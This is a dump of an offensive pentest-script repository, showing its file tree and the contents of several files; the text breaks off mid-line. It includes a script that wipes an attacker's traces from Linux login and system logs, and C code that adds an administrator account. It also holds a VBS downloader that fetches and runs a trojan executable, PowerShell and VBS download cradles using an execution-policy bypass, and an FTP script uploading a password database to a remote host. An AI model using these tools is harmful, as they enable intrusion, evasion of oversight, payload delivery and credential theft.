├── .DS_Store ├── Burp Suite Extender.md ├── Cleaning └── linux_clean.sh ├── Command └── Useradd.c ├── Exploit_write ├── findbadchar.md └── findbadchar.py ├── FileTransfer ├── FTP │ ├── ftpserver.md │ └── ftpserver.py ├── HttpServer │ ├── SimpleHttpUpload.py │ ├── SimpleHttpUpload_readme.txt │ └── one-liners webserver ├── ftp.txt ├── powershell_download.txt ├── tinyfilemanager.php └── windows │ ├── downlaod.vbs │ ├── wget.ps1 │ ├── wget.vbs │ └── wget1.ps1 ├── Mail ├── SMTP_User_Enum.py ├── receive_mail.py └── receive_mail_ssl.py ├── PSExec └── psexec_toolist.txt ├── PTH ├── autocheck_pth.sh └── pth-winexe.txt ├── PasswordCrack ├── zipcrack.py └── zipcrack.sh ├── PortFwd └── README.md ├── PrivilegeEscalation ├── Linux │ └── ps_history.sh └── Windows │ ├── Hash │ └── vssown.vbs │ ├── README.md │ ├── WinPrivCheck.bat │ ├── jollyfrogs-batch.bat │ └── ms16_032_intrd_mod.ps1 ├── Python ├── .DS_Store ├── auto_get_proxy │ ├── proxies.txt │ ├── run.py │ └── user_agents.txt ├── bugscan_run.py ├── cdn_identify.py ├── drcom2.6.py ├── port_knocking.py ├── port_knocking.sh ├── readlog │ ├── read.txt │ └── readlog.py ├── shodan │ ├── .DS_Store │ ├── get.py │ └── search.py ├── top500 │ ├── Top100Pwd.txt │ ├── Top500Name.txt │ ├── Top500Name_cn.txt │ ├── main.py │ ├── pinyin │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ └── chars.txt │ └── top10W │ │ └── top10W.txt ├── 修改文件名 │ ├── 加后缀.py │ └── 改成特定文件名.py.txt ├── 修改文件时间戳 │ ├── 单个.py │ └── 批量当前目录.py ├── 单个替换xml.py ├── 处理iispwd │ └── a.py ├── 批量替换xml.py ├── 目录扫描整理 │ ├── Thumbs.db │ ├── del.py │ ├── temp.xxoo │ ├── 删除乱码.py │ ├── 删除同名hash同.py │ └── 删除文件重复的行.py ├── 脱裤py脚本 │ └── 自定义cookie批量GET(POST).py └── 遍历子目录和路径.py ├── README.md ├── Recon-windows ├── iis.vbs ├── osinfo.vbs ├── ping.vbs └── user_detail_info.vbs ├── ReverseShell ├── php-reverse-shell ├── php-reverse-shell.php ├── revbshell │ ├── LICENSE │ ├── README.md │ ├── client.vbs │ └── server.py └── vbs-reverse-shell │ ├── LICENSE │ ├── README.rst │ ├── reverse_shell.vbs │ └── 
server.py ├── RunAs ├── RunAsSpc.txt ├── runas.ps1 └── schtasks.txt ├── SMB └── net_share_brute_force.txt ├── SNMP └── scan.txt ├── Web ├── Domain │ └── bing_api.py └── Recon │ └── simple_wp_check.py ├── WebExp └── DotNetPaddingAttack.py ├── bat ├── cmd压缩解压 │ ├── atzip.bat │ ├── readme.bat │ ├── unzip.exe │ ├── wwwroot │ │ ├── atzip.bat │ │ └── zip.exe │ └── zip.exe ├── dsquery ou 所有pc │ ├── allou.txt │ └── test.bat ├── exe可否执行 │ ├── a.exe │ └── test.txt ├── net_use.bat ├── ping │ ├── netview1.txt │ └── test1.bat ├── pingbat.bat ├── 收集系统信息.bat └── 遍历所有子目录子文件 │ ├── xlc.bat │ └── xlc.txt ├── port_scan └── tcpportlist.txt ├── quickput.py └── vbs ├── finddomaincontrol.vbs ├── iis.vbs ├── osinfo.vbs ├── ping.vbs ├── windows获得所有本地账户信息 └── ff.vbs └── 收集系统信息.bat /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/.DS_Store -------------------------------------------------------------------------------- /Burp Suite Extender.md: -------------------------------------------------------------------------------- 1 | # Burp Suite Extender 2 | 3 | 1. Flow, 纪录repeater请求历史 4 | 5 | 2. 
Mark different browser, 标记不同浏览器,用于多用户权限测试 6 | 7 | -------------------------------------------------------------------------------- /Cleaning/linux_clean.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo " linux clear log " 3 | echo " by knlve 2008-08-29" 4 | echo "===============================" 5 | # chmod 777 log 6 | # ./log xx.xx.xx.xx And ./log root 7 | if [ -f "/var/log/wtmp" ];then 8 | cat /var/log/wtmp | grep -v $1 >> /var/log/temp1; 9 | chgrp --reference /var/log/wtmp /var/log/temp1; 10 | chown --reference /var/log/wtmp /var/log/temp1; 11 | touch -r /var/log/wtmp /var/log/temp1; 12 | mv -f /var/log/temp1 /var/log/wtmp; 13 | fi 14 | if [ -f "/var/log/lastlog" ];then 15 | cat /var/log/lastlog |grep -v $1 >> /var/log/temp2; 16 | chgrp --reference /var/log/lastlog /var/log/temp2; 17 | chown --reference /var/log/lastlog /var/log/temp2; 18 | touch -r /var/log/lastlog /var/log/temp2; 19 | mv -f /var/log/temp2 /var/log/lastlog; 20 | fi 21 | if [ -f "/var/log/messages" ];then 22 | cat /var/log/messages | grep -v $1 >> /var/log/temp3; 23 | chgrp --reference /var/log/messages /var/log/temp3; 24 | chown --reference /var/log/messages /var/log/temp3; 25 | touch -r /var/log/messages /var/log/temp3; 26 | mv -f /var/log/temp3 /var/log/messages; 27 | fi 28 | if [ -f "/var/log/utmp" ];then 29 | cat /var/log/utmp | grep -v $1 >> /var/log/temp4; 30 | chgrp --reference /var/log/utmp /var/log/temp4; 31 | chown --reference /var/log/utmp /var/log/temp4; 32 | touch -r /var/log/utmp /var/log/temp4; 33 | mv -f /var/log/temp4 /var/log/utmp; 34 | fi 35 | if [ -f "/var/log/wtmpx" ];then 36 | cat /var/log/wtmpx | grep -v $1 >> /var/log/temp5; 37 | chgrp --reference /var/log/wtmpx /var/log/temp5; 38 | chown --reference /var/log/wtmpx /var/log/temp5; 39 | touch -r /var/log/wtmpx /var/log/temp5; 40 | mv -f /var/log/temp5 /var/log/wtmpx; 41 | fi if [ -f "/var/log/utmpx" ];then 42 | cat /var/log/utmpx | grep -v $1 >> /var/log/temp6; 
43 | chgrp --reference /var/log/utmpx /var/log/temp6; 44 | chown --reference /var/log/utmpx /var/log/temp6; 45 | touch -r /var/log/utmpx /var/log/temp6; 46 | mv -f /var/log/temp6 /var/log/utmpx; 47 | fi 48 | if [ -f "/var/log/syslog" ];then 49 | cat /var/log/syslog | grep -v $1 >> /var/log/temp7; 50 | chgrp --reference /var/log/syslog /var/log/temp7; 51 | chown --reference /var/log/syslog /var/log/temp7; 52 | touch -r /var/log/syslog /var/log/temp7; 53 | mv -f /var/log/temp7 /var/log/syslog; 54 | fi 55 | if [ -f "/var/log/secure" ];then 56 | cat /var/log/secure | grep -v $1 >> /var/log/temp8; 57 | chgrp --reference /var/log/secure /var/log/temp8; 58 | chown --reference /var/log/secure /var/log/temp8; 59 | touch -r /var/log/secure /var/log/temp8; 60 | mv -f /var/log/temp8 /var/log/secure; 61 | fi 62 | /usr/bin/killall -HUP syslogd; 63 | echo "Clear log is success! 64 | #rm -fr log 65 | -------------------------------------------------------------------------------- /Command/Useradd.c: -------------------------------------------------------------------------------- 1 | #include /* system, NULL, EXIT_FAILURE */ 2 | int main () 3 | { 4 | int i; 5 | i=system ("net localgroup administrators low /add"); 6 | return 0; 7 | } 8 | -------------------------------------------------------------------------------- /Exploit_write/findbadchar.md: -------------------------------------------------------------------------------- 1 | 2 | ###### USAGE 3 | 4 | 1. In Immunity Debugger, Select the compared memory Copy to clipboard. 5 | 2. Save memory to mem.txt 6 | 3. Set start compare point value 7 | 4. 
Run with findbadchar.py star_compare_point 8 | -------------------------------------------------------------------------------- /Exploit_write/findbadchar.py: -------------------------------------------------------------------------------- 1 | #author : github.com/xiaoxiaoleo 2 | 3 | from __future__ import print_function 4 | import re 5 | import sys 6 | 7 | compare_point=int(sys.argv[1]) 8 | 9 | 10 | orign_lst = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '0A', '0B', '0C', '0D', '0E', '0F', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '1A', '1B', '1C', '1D', '1E', '1F', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '2A', '2B', '2C', '2D', '2E', '2F', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '3A', '3B', '3C', '3D', '3E', '3F', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4A', '4B', '4C', '4D', '4E', '4F', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '5A', '5B', '5C', '5D', '5E', '5F', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '6A', '6B', '6C', '6D', '6E', '6F', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '7A', '7B', '7C', '7D', '7E', '7F', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '8A', '8B', '8C', '8D', '8E', '8F', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '9A', '9B', '9C', '9D', '9E', '9F', 'A0', 'A1', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'B0', 'B1', 'B2', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'BA', 'BB', 'BC', 'BD', 'BE', 'BF', 'C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'CA', 'CB', 'CC', 'CD', 'CE', 'CF', 'D0', 'D1', 'D2', 'D3', 'D4', 'D5', 'D6', 'D7', 'D8', 'D9', 'DA', 'DB', 'DC', 'DD', 'DE', 'DF', 'E0', 'E1', 'E2', 'E3', 'E4', 'E5', 'E6', 'E7', 'E8', 'E9', 'EA', 'EB', 'EC', 'ED', 'EE', 'EF', 'F0', 'F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'FA', 'FB', 'FC', 'FD', 'FE', 'FF'] 11 | 12 | 13 | def reorder(mystr): 14 | tmp = {} 15 
| tmp[0] = mystr[0:2] 16 | tmp[1] = mystr[2:4] 17 | tmp[2] = mystr[4:6] 18 | tmp[3] = mystr[6:8] 19 | return [tmp[3],tmp[2],tmp[1],tmp[0]] 20 | 21 | def genhex(mystr): 22 | b=re.findall(r'.{2}',mystr) 23 | c='\\x'.join(b) 24 | print(c) 25 | 26 | def print_badchar(orign_lst, mem_lst, compare_point): 27 | print (15 * '--') 28 | for i in range(0, len(orign_lst)): 29 | print (orign_lst[i], mem_lst[i + compare_point]) 30 | 31 | print (15 * '--') 32 | for i in range(0, len(orign_lst)): 33 | if orign_lst[i] != mem_lst[i + compare_point]: 34 | print (orign_lst[i], ' - ', mem_lst[i + compare_point]) 35 | print (15 * '--') 36 | bad_str = '' 37 | for i in range(0, len(orign_lst)): 38 | if orign_lst[i] != mem_lst[i + compare_point]: 39 | bad_str += orign_lst[i] 40 | genhex(bad_str) 41 | 42 | 43 | if __name__ == '__main__': 44 | mem = open('mem.txt') 45 | mem_list = [] 46 | mem_lst = [] 47 | for i in mem: 48 | l = i.split(' ') 49 | if len(l) > 4: 50 | mem_list.append(l[3]) 51 | mem_lst.extend(reorder(l[3])) 52 | print_badchar(orign_lst, mem_lst, compare_point) 53 | mem.close() 54 | -------------------------------------------------------------------------------- /FileTransfer/FTP/ftpserver.md: -------------------------------------------------------------------------------- 1 | #### FTP Server: 2 | 3 | apt-get install python-pyftpdlib 4 | 5 | python ftpserver.py 6 | 7 | username:test 8 | password:test 9 | 10 | 11 | #### Windows7 12 | 13 | echo open 10.10.14.168 21> ftp.txt 14 | echo user test test>> ftp.txt 15 | echo help>> ftp.txt 16 | echo put CEH.kdbx >> ftp.txt 17 | echo bye >> ftp.txt 18 | ftp -v -n -s:ftp.txt 19 | 20 | -------------------------------------------------------------------------------- /FileTransfer/FTP/ftpserver.py: -------------------------------------------------------------------------------- 1 | from pyftpdlib.authorizers import DummyAuthorizer 2 | from pyftpdlib.handlers import FTPHandler 3 | from pyftpdlib.servers import FTPServer 4 | 5 | 6 | # The port 
the FTP server will listen on. 7 | # This must be greater than 1023 unless you run this script as root. 8 | FTP_PORT = 21 # NOTE(review): 21 is below 1024, so with this value the script has to run as root (see the comment above); pick a high port to avoid that. 9 | 10 | # The name of the FTP user that can log in. 11 | FTP_USER = "test" 12 | 13 | # The FTP user's password. 14 | FTP_PASSWORD = "test" # NOTE(review): fixed, guessable credentials sent over cleartext FTP; this is a throwaway transfer account, so run the server only for the duration of the transfer. 15 | 16 | # The directory the FTP user will have full read/write access to. 17 | FTP_DIRECTORY = "." # NOTE(review): "." is the directory the script is started from, not the script's own directory. 18 | 19 | 20 | def main(): """Start a pyftpdlib FTP server on FTP_PORT that serves FTP_DIRECTORY to the single account FTP_USER/FTP_PASSWORD; blocks in serve_forever().""" 21 | authorizer = DummyAuthorizer() 22 | 23 | # Define a new user having full r/w permissions. 24 | authorizer.add_user(FTP_USER, FTP_PASSWORD, FTP_DIRECTORY, perm='elradfmw') # NOTE(review): per the comment above this is the full read/write set (pyftpdlib's d/f/w letters are delete/rename/store), so the client can overwrite or remove anything under FTP_DIRECTORY — verify nothing else lives there. 25 | 26 | handler = FTPHandler 27 | handler.authorizer = authorizer 28 | 29 | # Define a customized banner (string returned when client connects) 30 | handler.banner = "pyftpdlib based ftpd ready." 31 | 32 | # Optionally specify range of ports to use for passive connections. 33 | #handler.passive_ports = range(60000, 65535) # NOTE(review): with this left commented out the library presumably picks ephemeral data ports; pin a range here if a host firewall has to allow them. 34 | 35 | address = ('', FTP_PORT) # NOTE(review): '' binds every local interface; on a multi-homed host bind only the address the remote side should reach. 36 | server = FTPServer(address, handler) 37 | 38 | server.max_cons = 256 39 | server.max_cons_per_ip = 5 40 | 41 | server.serve_forever() 42 | 43 | 44 | if __name__ == '__main__': 45 | main() 46 | -------------------------------------------------------------------------------- /FileTransfer/HttpServer/SimpleHttpUpload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """Simple HTTP Server With Upload. 4 | This module builds on BaseHTTPServer by implementing the standard GET 5 | and HEAD requests in a fairly straightforward manner.
6 | see: https://gist.github.com/UniIsland/3346170 7 | """ 8 | 9 | 10 | __version__ = "0.1" 11 | __all__ = ["SimpleHTTPRequestHandler"] 12 | __author__ = "bones7456" 13 | __home_page__ = "http://li2z.cn/" 14 | 15 | import os 16 | import posixpath 17 | import http.server 18 | import urllib.request, urllib.parse, urllib.error 19 | import cgi 20 | import shutil 21 | import mimetypes 22 | import re 23 | from io import BytesIO 24 | 25 | 26 | class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler): 27 | 28 | """Simple HTTP request handler with GET/HEAD/POST commands. 29 | This serves files from the current directory and any of its 30 | subdirectories. The MIME type for files is determined by 31 | calling the .guess_type() method. And can reveive file uploaded 32 | by client. 33 | The GET/HEAD/POST requests are identical except that the HEAD 34 | request omits the actual contents of the file. 35 | """ 36 | 37 | server_version = "SimpleHTTPWithUpload/" + __version__ 38 | 39 | def do_GET(self): 40 | """Serve a GET request.""" 41 | f = self.send_head() 42 | if f: 43 | self.copyfile(f, self.wfile) 44 | f.close() 45 | 46 | def do_HEAD(self): 47 | """Serve a HEAD request.""" 48 | f = self.send_head() 49 | if f: 50 | f.close() 51 | 52 | def do_POST(self): 53 | """Serve a POST request.""" 54 | r, info = self.deal_post_data() 55 | print((r, info, "by: ", self.client_address)) 56 | f = BytesIO() 57 | f.write(b'') 58 | f.write(b"\nUpload Result Page\n") 59 | f.write(b"\n

Upload Result Page

\n") 60 | f.write(b"
\n") 61 | if r: 62 | f.write(b"Success:") 63 | else: 64 | f.write(b"Failed:") 65 | f.write(info.encode()) 66 | f.write(("
back" % self.headers['referer']).encode()) 67 | f.write(b"
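Powerd By: bones7456, check new version at ") 68 | f.write(b"") 69 | f.write(b"here.\n\n") 70 | length = f.tell() 71 | f.seek(0) 72 | self.send_response(200) 73 | self.send_header("Content-type", "text/html") 74 | self.send_header("Content-Length", str(length)) 75 | self.end_headers() 76 | if f: 77 | self.copyfile(f, self.wfile) 78 | f.close() 79 | 80 | def deal_post_data(self): """Read one multipart/form-data upload from the request body and store it under the directory self.path maps to. Returns (ok, message); do_POST renders the message into the result page. The file is written only once the closing boundary has been seen; on a truncated body the partial file is closed and (False, ...) is returned.""" 81 | content_type = self.headers['content-type'] 82 | if not content_type: 83 | return (False, "Content-Type header doesn't contain boundary") 84 | boundary = content_type.split("=")[1].encode() 85 | remainbytes = int(self.headers['content-length']) 86 | line = self.rfile.readline() 87 | remainbytes -= len(line) 88 | if boundary not in line: 89 | return (False, "Content NOT begin with boundary") 90 | line = self.rfile.readline() 91 | remainbytes -= len(line) 92 | fn = re.findall(r'Content-Disposition.*name="file"; filename="(.*)"', line.decode()) 93 | if not fn: 94 | return (False, "Can't find out file name...") 95 | path = self.translate_path(self.path) # the filename is client-supplied: keep only its last component so a '..' or absolute path in it cannot place the file outside the served directory 96 | fn = os.path.join(path, os.path.basename(fn[0])) 97 | line = self.rfile.readline() 98 | remainbytes -= len(line) 99 | line = self.rfile.readline() 100 | remainbytes -= len(line) 101 | try: 102 | out = open(fn, 'wb') 103 | except IOError: 104 | return (False, "Can't create file to write, do you have permission to write?") 105 | 106 | preline = self.rfile.readline() 107 | remainbytes -= len(preline) 108 | while remainbytes > 0: 109 | line = self.rfile.readline() 110 | remainbytes -= len(line) 111 | if boundary in line: 112 | preline = preline[0:-1] # drop the line break that precedes the closing boundary; it belongs to the multipart framing, not the file 113 | if preline.endswith(b'\r'): 114 | preline = preline[0:-1] 115 | out.write(preline) 116 | out.close() 117 | return (True, "File '%s' upload success!" % fn) 118 | else: 119 | out.write(preline) 120 | preline = line # body ended before the closing boundary: close the partial file instead of leaking the handle 121 | out.close(); return (False, "Unexpect Ends of data.") 122 | 123 | def send_head(self): 124 | """Common code for GET and HEAD commands. 125 | This sends the response code and MIME headers.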
126 | Return value is either a file object (which has to be copied 127 | to the outputfile by the caller unless the command was HEAD, 128 | and must be closed by the caller under all circumstances), or 129 | None, in which case the caller has nothing further to do. 130 | """ 131 | path = self.translate_path(self.path) 132 | f = None 133 | if os.path.isdir(path): 134 | if not self.path.endswith('/'): 135 | # redirect browser - doing basically what apache does 136 | self.send_response(301) 137 | self.send_header("Location", self.path + "/") 138 | self.end_headers() 139 | return None 140 | for index in "index.html", "index.htm": 141 | index = os.path.join(path, index) 142 | if os.path.exists(index): 143 | path = index 144 | break 145 | else: 146 | return self.list_directory(path) 147 | ctype = self.guess_type(path) 148 | try: 149 | # Always read in binary mode. Opening files in text mode may cause 150 | # newline translations, making the actual size of the content 151 | # transmitted *less* than the content-length! 152 | f = open(path, 'rb') 153 | except IOError: 154 | self.send_error(404, "File not found") 155 | return None 156 | self.send_response(200) 157 | self.send_header("Content-type", ctype) 158 | fs = os.fstat(f.fileno()) 159 | self.send_header("Content-Length", str(fs[6])) 160 | self.send_header("Last-Modified", self.date_time_string(fs.st_mtime)) 161 | self.end_headers() 162 | return f 163 | 164 | def list_directory(self, path): 165 | """Helper to produce a directory listing (absent index.html). 166 | Return value is either a file object, or None (indicating an 167 | error). In either case, the headers are sent, making the 168 | interface the same as for send_head(). 
169 | """ 170 | try: 171 | list = os.listdir(path) 172 | except os.error: 173 | self.send_error(404, "No permission to list directory") 174 | return None 175 | list.sort(key=lambda a: a.lower()) 176 | f = BytesIO() 177 | displaypath = cgi.escape(urllib.parse.unquote(self.path)) 178 | f.write(b'') 179 | f.write(("\nDirectory listing for %s\n" % displaypath).encode()) 180 | f.write(("\n

Directory listing for %s

\n" % displaypath).encode()) 181 | f.write(b"
\n") 182 | f.write(b"
") 183 | f.write(b"") 184 | f.write(b"
\n") 185 | f.write(b"
\n\n
\n\n\n") 199 | length = f.tell() 200 | f.seek(0) 201 | self.send_response(200) 202 | self.send_header("Content-type", "text/html") 203 | self.send_header("Content-Length", str(length)) 204 | self.end_headers() 205 | return f 206 | 207 | def translate_path(self, path): 208 | """Translate a /-separated PATH to the local filename syntax. 209 | Components that mean special things to the local file system 210 | (e.g. drive or directory names) are ignored. (XXX They should 211 | probably be diagnosed.) 212 | """ 213 | # abandon query parameters 214 | path = path.split('?',1)[0] 215 | path = path.split('#',1)[0] 216 | path = posixpath.normpath(urllib.parse.unquote(path)) 217 | words = path.split('/') 218 | words = [_f for _f in words if _f] 219 | path = os.getcwd() 220 | for word in words: 221 | drive, word = os.path.splitdrive(word) 222 | head, word = os.path.split(word) 223 | if word in (os.curdir, os.pardir): continue 224 | path = os.path.join(path, word) 225 | return path 226 | 227 | def copyfile(self, source, outputfile): 228 | """Copy all data between two file objects. 229 | The SOURCE argument is a file object open for reading 230 | (or anything with a read() method) and the DESTINATION 231 | argument is a file object open for writing (or 232 | anything with a write() method). 233 | The only reason for overriding this would be to change 234 | the block size or perhaps to replace newlines by CRLF 235 | -- note however that this the default server uses this 236 | to copy binary data as well. 237 | """ 238 | shutil.copyfileobj(source, outputfile) 239 | 240 | def guess_type(self, path): 241 | """Guess the type of a file. 242 | Argument is a PATH (a filename). 243 | Return value is a string of the form type/subtype, 244 | usable for a MIME Content-type header. 
245 | The default implementation looks the file's extension 246 | up in the table self.extensions_map, using application/octet-stream 247 | as a default; however it would be permissible (if 248 | slow) to look inside the data to make a better guess. 249 | """ 250 | 251 | base, ext = posixpath.splitext(path) 252 | if ext in self.extensions_map: 253 | return self.extensions_map[ext] 254 | ext = ext.lower() 255 | if ext in self.extensions_map: 256 | return self.extensions_map[ext] 257 | else: 258 | return self.extensions_map[''] 259 | 260 | if not mimetypes.inited: 261 | mimetypes.init() # try to read system mime.types 262 | extensions_map = mimetypes.types_map.copy() 263 | extensions_map.update({ 264 | '': 'application/octet-stream', # Default 265 | '.py': 'text/plain', 266 | '.c': 'text/plain', 267 | '.h': 'text/plain', 268 | }) 269 | 270 | 271 | def test(HandlerClass = SimpleHTTPRequestHandler, 272 | ServerClass = http.server.HTTPServer): 273 | http.server.test(HandlerClass, ServerClass) 274 | 275 | if __name__ == '__main__': 276 | test() 277 | -------------------------------------------------------------------------------- /FileTransfer/HttpServer/SimpleHttpUpload_readme.txt: -------------------------------------------------------------------------------- 1 | root@kali:~/pentest-script/FileTransfer/HttpServer# python3 SimpleHttpUpload.py 2 | 3 | CURL 4 | root@kali:~/Desktop# curl -F file=@/root/Desktop/test.zip http://127.0.0.1:8000/ 5 | 6 | PowerShell 7 | $fileName = "mo.zip" 8 | $uri = "http://192.168.224.129:8000/" 9 | $currentPath = Convert-Path . 
10 | $filePath="$currentPath\$fileName" 11 | $fileBin = [System.IO.File]::ReadAlltext($filePath) 12 | $bodyLines = ("------------------------83cdc2d56002d24a","Content-Disposition: form-data; name=`"file`"; filename=`"$fileName`"","Content-Type: application/octet-stream;",$fileBin,"--------------------------83cdc2d56002d24a--$LF" ) -join "`r`n" 13 | 14 | Invoke-RestMethod -Uri $uri -Method Post -ContentType "multipart/form-data; boundary=------------------------83cdc2d56002d24a" -Body $bodyLines 15 | 16 | 17 | -------------------------------------------------------------------------------- /FileTransfer/HttpServer/one-liners webserver: -------------------------------------------------------------------------------- 1 | python -m SimpleHTTPServer 2 | python3 -m http.server 3 | ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start" 4 | php -S 0.0.0.0:8888 5 | -------------------------------------------------------------------------------- /FileTransfer/ftp.txt: -------------------------------------------------------------------------------- 1 | echo open 10.11.0.138 21> ftp.txt 2 | echo USER offsec>> ftp.txt 3 | echo ftp>> ftp.txt 4 | echo bin >> ftp.txt 5 | echo GET/PUT nc.exe >> ftp.txt 6 | echo bye >> ftp.txt 7 | ftp -v -n -s:ftp.txt 8 | -------------------------------------------------------------------------------- /FileTransfer/powershell_download.txt: -------------------------------------------------------------------------------- 1 | C:\HFS>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x/runasspc.exe','c:\users\public\runaa.exe') 2 | 3 | C:\Users\kostas\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe" 4 | -------------------------------------------------------------------------------- /FileTransfer/windows/downlaod.vbs: -------------------------------------------------------------------------------- 1 | Set Post = 
CreateObject("Msxml2.XMLHTTP") 2 | Set Shell = CreateObject("Wscript.Shell") 3 | Post.Open "GET","http://www.xxx.com/muma.exe",0 4 | Post.Send() 5 | Set aGet = CreateObject("ADODB.Stream") 6 | aGet.Mode = 3 7 | aGet.Type = 1 8 | aGet.Open() 9 | aGet.Write(Post.responseBody) 10 | aGet.SaveToFile "c:\windows\temp\TS.exe",2 11 | wscript.sleep 1000 12 | Shell.Run ("c:\windows\temp\TS.exe") '延迟过后执行下载文件 13 | -------------------------------------------------------------------------------- /FileTransfer/windows/wget.ps1: -------------------------------------------------------------------------------- 1 | echo $url = $args[0] > wget.ps1 2 | echo $output = "$($pwd)\$($args[1])" >> wget.ps1 3 | echo $wc = New-Object System.Net.WebClient >> wget.ps1 4 | echo $wc.DownloadFile($url, $output) >> wget.ps1 5 | 6 | #usage 7 | #powershell.exe -ExecutionPolicy bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 http://x.x.x.x filename 8 | -------------------------------------------------------------------------------- /FileTransfer/windows/wget.vbs: -------------------------------------------------------------------------------- 1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 7 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs 8 | echo Err.Clear >> wget.vbs 9 | echo Set http = Nothing >> wget.vbs 10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 13 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> 
wget.vbs 14 | echo http.Open "GET",strURL,False >> wget.vbs 15 | echo http.Send >> wget.vbs 16 | echo varByteArray = http.ResponseBody >> wget.vbs 17 | echo Set http = Nothing >> wget.vbs 18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 19 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs 20 | echo strData = "" >> wget.vbs 21 | echo strBuffer = "" >> wget.vbs 22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 23 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs 24 | echo Next >> wget.vbs 25 | echo ts.Close >> wget.vbs 26 | 27 | 28 | #After you've created wget.vbs 29 | #cscript wget.vbs http://192.168.10.5/evil.exe evil.exe 30 | -------------------------------------------------------------------------------- /FileTransfer/windows/wget1.ps1: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | 3 | import sys 4 | 5 | if len(sys.argv) !=3: 6 | print "Usage: gen_ps1_wget.py " 7 | sys.exit(0) 8 | print "\n" 9 | print "Copy and paste the following in to the host:" 10 | print "\n" 11 | print "echo $storageDir = $pwd > wget.ps1" 12 | print "echo $webclient = New-Object System.Net.WebClient >> wget.ps1" 13 | print "echo $url = 'http://%s/%s' >> wget.ps1"%(sys.argv[1],sys.argv[2]) 14 | print "echo $file = '%s' >> wget.ps1" % sys.argv[2] 15 | print "echo $webclient.DownloadFile($url,$file) >> wget.ps1" 16 | print "\n" 17 | 18 | #powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 19 | -------------------------------------------------------------------------------- /Mail/SMTP_User_Enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SMPT username enumeration (VRFY) script 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) !=2: 7 | print "Usage: vrfy.py " 8 | sys.exit(0) 9 | 10 | #create socket 11 | s = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) 12 | #connect to socket 13 | connect = s.connect(('10.11.1.217',25)) 14 | #receive banner 15 | banner = s.recv(1024) 16 | print banner 17 | #VRFY user 18 | s.send('VRFY' + sys.argv[1] + '\r\n') 19 | result = s.recv(1024) 20 | print result 21 | #close the socket 22 | s.close() 23 | -------------------------------------------------------------------------------- /Mail/receive_mail.py: -------------------------------------------------------------------------------- 1 | 2 | import poplib 3 | pop3server = 'pop.gmail.com' 4 | username = 'username@gmail.com' 5 | password = 'your_password' 6 | pop3server = poplib.POP3(pop3server) # open connection 7 | print (pop3server.getwelcome()) #show welcome message 8 | pop3server.user(username) 9 | pop3server.pass_(password) 10 | pop3info = pop3server.stat() #access mailbox status 11 | mailcount = pop3info[0] #toral email 12 | print("Total no. of Email : " , mailcount) 13 | print ("\n\nStart Reading Messages\n\n") 14 | for i in range(mailcount): 15 | for message in pop3server.retr(i+1)[1]: 16 | print (message) 17 | pop3server.quit() 18 | 19 | -------------------------------------------------------------------------------- /Mail/receive_mail_ssl.py: -------------------------------------------------------------------------------- 1 | 2 | import poplib 3 | pop3server = 'pop.gmail.com' 4 | username = 'username@gmail.com' 5 | password = 'your_password' 6 | pop3server = poplib.POP3_SSL(pop3server) # open connection 7 | print (pop3server.getwelcome()) #show welcome message 8 | pop3server.user(username) 9 | pop3server.pass_(password) 10 | pop3info = pop3server.stat() #access mailbox status 11 | mailcount = pop3info[0] #toral email 12 | print("Total no. 
